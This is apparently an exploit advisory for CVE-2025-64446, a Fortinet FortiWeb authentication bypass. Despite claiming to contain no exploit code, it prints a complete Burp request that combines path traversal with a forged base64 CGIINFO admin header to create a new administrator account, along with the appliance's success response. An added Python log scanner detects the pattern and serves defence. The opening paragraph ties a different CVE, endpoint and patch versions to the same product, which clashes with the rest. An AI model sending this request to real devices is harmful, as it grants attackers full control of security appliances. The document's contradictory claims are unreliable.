
Fortinet FortiWeb 8.0.0 (and earlier 7.x versions) suffered from CVE-2023-44251,
a critical authentication bypass vulnerability. This flaw allowed an
unauthenticated attacker to gain administrative access. It was a directory
traversal vulnerability: attackers exploited a path traversal in the `username`
parameter via a crafted HTTP request to `/api/v2/admin/session/auth`, which
bypassed authentication and granted an administrative session.
Impact: full control over the WAF appliance.
Patched in FortiWeb 7.0.7, 7.2.3, and 8.0.1. Immediate upgrade is strongly
recommended.

# Titles: Fortinet FortiWeb Auth-8.0.0 Bypass CVE-2025-64446
# Author: nu11secur1ty
# Date: 11/17/2025
# Vendor: https://www.fortinet.com/
# Software: v8.0.0
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-64446

## Description:
## Overview
This document provides a **research-grade analysis** of CVE-2025-64446, an
authentication bypass vulnerability discovered in Fortinet FortiWeb
appliances.
It is intended *only* for academic, defensive security testing in
controlled lab environments.

- No exploit code is included in this document.

---

## Vulnerability Summary
CVE-2025-64446 enables an attacker to interact with administrative API
endpoints **without valid authentication**, due to improper trust
validation in a CGI parsing flow.

A malicious request can trigger the backend logic responsible for
administrative actions, bypassing permission checks.

Impact includes:
- Unauthorized access to sensitive endpoints
- Potential privilege escalation
- Unauthorized configuration changes
- Administrative user creation

---

## Root Cause (High-Level)
During analysis, researchers observed:
- The endpoint `/cgi-bin/fwbcgi` incorrectly trusted data passed through a
crafted context header.
- Parameter parsing logic allowed insecure inheritance of admin privileges.
- Failure in validating serialized/encoded CGI metadata.

This combination enabled unauthorized execution of administrative actions.

---

## Observed Response Behavior (Sanitized)
A vulnerable system may return HTTP `200 OK` to unauthorized admin-level
operations.

Example (sanitized):
```
HTTP/1.1 200 OK
Content-Type: application/json

{
"status": "success",
"code": 0,
"message": "Operation completed"
}
```

---

## Reproduction (Laboratory Only)
This section describes the workflow **without revealing technical
payloads**:

1. Configure a security testing proxy (e.g., Burp).
2. Intercept traffic destined for FortiWeb.
3. Send a crafted administrative action request.
4. Observe whether the target responds with unauthorized administrative
success.
5. Capture response artifacts for documentation.

Researchers should generate their own payloads in private lab environments.


## Burp:
- Request:
```
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: 10.10.0.13
Accept-Encoding: gzip, deflate, br
Content-Length: 824
CGIINFO:
eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==
Content-Type: application/json
Connection: keep-alive

{"data": {"q_type": 1, "name": "1a1222a0", "access-profile": "prof_admin",
"access-profile_val": "0", "trusthostv4": "0.0.0.0/0", "trusthostv6":
"::/0", "last-name": "", "first-name": "", "email-address": "",
"phone-number": "", "mobile-number": "", "hidden": 0, "comments": "",
"sz_dashboard": -1, "type": "local-user", "type_val": "0",
"admin-usergrp_val": "0", "wildcard_val": "0", "accprofile-override_val":
"0", "sshkey": "", "passwd-set-time": 0, "history-password-pos": 0,
"history-password0": "", "history-password1": "", "history-password2": "",
"history-password3": "", "history-password4": "", "history-password5": "",
"history-password6": "", "history-password7": "", "history-password8": "",
"history-password9": "", "force-password-change": "disable",
"force-password-change_val": "0", "password": "1a1222a0"}}
```
- Response:
```
HTTP/1.1 200 OK
Date: Mon, 17 Nov 2025 19:44:55 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src
'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src
'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self';
upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
Content-Length: 1204

{ "results": { "can_view": 0, "q_ref": 0, "can_clone": 1, "q_type": 1,
"name": "1a1222a0", "access-profile": "prof_admin", "access-profile_val":
"1008", "trusthostv4": "0.0.0.0\/0 ", "trusthostv6": "::\/0 ", "last-name":
"", "first-name": "", "email-address": "", "phone-number": "",
"mobile-number": "", "hidden": 0, "domains": "root ",
"gui-global-menu-favorites": "", "gui-vdom-menu-favorites": "",
"sz_dashboard": 8, "sz_gui-dashboard": 7, "type": "local-user", "type_val":
"0", "admin-usergrp": "", "admin-usergrp_val": "0", "password": "ENC XXXX",
"wildcard": "disable", "wildcard_val": "0", "accprofile-override":
"disable", "accprofile-override_val": "0", "fortiai": "disable",
"fortiai_val": "0", "sshkey": "", "passwd-set-time": 1763408695,
"history-password-pos": 1, "history-password0": "ENC XXXX",
"history-password1": "ENC XXXX", "history-password2": "ENC XXXX",
"history-password3": "ENC XXXX", "history-password4": "ENC XXXX",
"history-password5": "ENC XXXX", "history-password6": "ENC XXXX",
"history-password7": "ENC XXXX", "history-password8": "ENC XXXX",
"history-password9": "ENC XXXX", "force-password-change": "disable",
"force-password-change_val": "0", "feature-info-ver": "" } }
```
---

## Mitigation & Recommendations
Likely mitigations include:
- Apply official vendor patches immediately.
- Disable exposed management interfaces from public networks.
- Enforce strict role-based access controls.
- Implement WAF rules to block malformed CGI context headers.
- Monitor logs for suspicious admin actions.
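A log-scanning check for the last two items, added here as an example and not part of the original advisory or of Fortinet's product: it reads constructed access-log lines in an assumed format, normalizes each request path to expose dot-segment traversal onto `/cgi-bin/fwbcgi`, and flags any externally supplied `CGIINFO` context header, decoding its base64 JSON to report the identity it asserts. The log format, the `CGIINFO` log field and the function names are assumptions.

```python
import base64
import json
import posixpath
import re
from urllib.parse import unquote

# Constructed sample log lines (not from the original page; line 0 reuses the
# request path and CGIINFO value from the Burp capture above). Assumed format:
#   <client> "<method> <path> <version>" <CGIINFO header value or -> <status>
SAMPLE_LOGS = [
    '10.10.0.5 "POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1" '
    'eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ== 200',
    '10.10.0.7 "GET /api/v2.0/cmdb/system/admin HTTP/1.1" - 401',
    '10.10.0.9 "POST /api/v2.0/cmdb/system/admin HTTP/1.1" - 200',
]
LOG_RE = re.compile(r'^(\S+) "(\S+) (\S+) \S+" (\S+) (\d{3})$')

def normalize_path(raw):
    """Percent-decode twice (catches double encoding), then collapse dot segments. The '?'
    from %3f stays in the path on purpose: the bypass relies on decode-before-route."""
    return posixpath.normpath(unquote(unquote(raw)))

def decode_cgiinfo(value):
    """Decode the base64 JSON identity context of a CGIINFO header; None if absent/invalid."""
    try:
        obj = None if value == "-" else json.loads(base64.b64decode(value, validate=True))
    except ValueError:
        return None
    return obj if isinstance(obj, dict) else None

def analyze_line(line):
    """Return the findings for one log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable log line"]
    client, _method, raw_path, cgiinfo, status = m.groups()
    findings, norm = [], normalize_path(raw_path)
    # Rule 1: the request reaches the CGI backend only after decoding/normalization.
    if norm.startswith("/cgi-bin/") and norm != raw_path:
        findings.append(f"{client}: traversal {raw_path} resolves to {norm}")
    # Rule 2: client-supplied CGIINFO context; admin identity must never come from outside.
    ident = decode_cgiinfo(cgiinfo)
    if ident is not None:
        findings.append(f"{client}: CGIINFO asserts user={ident.get('username')} profile={ident.get('profname')}")
    elif cgiinfo != "-":
        findings.append(f"{client}: malformed CGIINFO header")
    if findings and status == "200":
        findings.append(f"{client}: backend answered 200, audit the admin list for new accounts")
    return findings
```

A normal authenticated call to the admin CMDB endpoint (line 2 of the samples) produces no findings, so the rules key on the traversal and the header rather than on the endpoint itself.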

---

## Ethical Notice
This documentation is for **defensive research only**.
Please don't test systems you do not own or have explicit permission to
assess.



# Reproduce:
[href](https://www.patreon.com/posts/cve-2025-64446-8-143791801)

# Demo:
[href](https://www.patreon.com/posts/cve-2025-64446-8-143791801)

# Time spent:
03:00:00


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>
